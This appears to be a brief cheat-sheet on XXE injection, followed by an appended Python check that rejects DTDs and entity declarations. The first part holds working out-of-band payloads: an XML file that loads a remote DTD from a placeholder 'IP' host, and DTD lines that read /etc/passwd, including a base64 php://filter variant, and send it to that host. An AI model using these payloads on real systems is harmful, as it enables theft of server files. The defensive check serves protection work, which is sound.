XXE

Common XXE

  • File exploit.xml

<?xml version="1.0"?>
<!DOCTYPE nosf[
    <!ELEMENT nosf ANY>
    <!ENTITY % dtd SYSTEM "http://IP/xpl.dtd">
%dtd;]>
<nosf></nosf>

  • File xpl.dtd

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://IP/content=%file;'>">
%all;

  • Sometimes it is also worth trying to base64-encode the files. 😉

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://IP/content=%file;'>">
%all;
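
A parser-side check that refuses the constructs both files above depend on (a DOCTYPE, entity declarations, external references), added here as an example and not part of the original page. The name `check_xml` and the sample constants are assumptions; it uses only Python's standard-library expat bindings, which do not fetch the remote DTD.

```python
import xml.parsers.expat as expat

class ForbiddenXML(ValueError):
    """A DTD feature that enables XXE was found in the input."""

def _reject(reason):
    # Build an expat handler that aborts parsing with the given reason.
    def handler(*_args):
        raise ForbiddenXML(reason)
    return handler

def check_xml(data: bytes, allow_dtd: bool = False) -> str:
    """Return 'ok', 'malformed', or the first forbidden construct seen."""
    parser = expat.ParserCreate()
    if not allow_dtd:
        # exploit.xml needs a DOCTYPE to declare and expand %dtd;
        parser.StartDoctypeDeclHandler = _reject("doctype")
    # Even when a DTD is tolerated, refuse every entity declaration
    # (general or parameter, internal or SYSTEM) and any external reference.
    parser.EntityDeclHandler = _reject("entity-declaration")
    parser.ExternalEntityRefHandler = _reject("external-entity")
    try:
        parser.Parse(data, True)
    except ForbiddenXML as exc:
        return str(exc)
    except expat.ExpatError:
        return "malformed"
    return "ok"

# exploit.xml as shown on this page ("IP" is the page's own placeholder).
EXPLOIT_XML = b"""<?xml version="1.0"?>
<!DOCTYPE nosf[
    <!ELEMENT nosf ANY>
    <!ENTITY % dtd SYSTEM "http://IP/xpl.dtd">
%dtd;]>
<nosf></nosf>"""

# Constructed samples: a plain document and one with an internal entity.
BENIGN_XML = b"<order><id>42</id></order>"
INTERNAL_ENTITY_XML = b'<!DOCTYPE r [<!ENTITY a "b">]><r>&a;</r>'

if __name__ == "__main__":
    for name, doc in [("exploit", EXPLOIT_XML), ("benign", BENIGN_XML),
                      ("entity", INTERNAL_ENTITY_XML)]:
        print(name, check_xml(doc), check_xml(doc, allow_dtd=True))
```

Run the check on untrusted input before handing it to the application's real parser, and treat any verdict other than `ok` as a rejection.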
